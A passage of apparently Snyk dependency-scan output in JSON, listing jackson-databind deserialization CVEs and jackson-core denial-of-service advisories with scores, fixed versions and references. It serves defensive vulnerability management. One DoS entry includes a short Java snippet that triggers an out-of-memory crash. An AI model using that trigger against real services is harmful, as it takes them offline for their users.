"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:25:40.161831Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:24:46Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:24:39Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.774444Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.690019Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19362" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c8hm-7hpq-7jhg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:19.256477Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.043196Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.593938Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19360" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f9hv-mg5h-xcw9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:23.673097Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:34.457712Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.548577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19361" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx9v-gmh4-mgqw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:31.715185Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:43Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.091904Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Alessio Soldano" + ], + "semver": { + "vulnerable": [ + "[,2.8.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", + "className": "UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", + "className": "ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/pull/322", + "title": "GitHub PR" + }, + { + "url": "https://issues.jboss.org/browse/JBEAP-6316", + "title": "Jira Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:01.546686Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-01-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:01.546686Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "gmethwin@github" + ], + "semver": { + "vulnerable": [ + "[2.3.0-rc1,2.7.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", + "className": "UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", + "className": "WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-core/issues/315", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:48.004490Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash 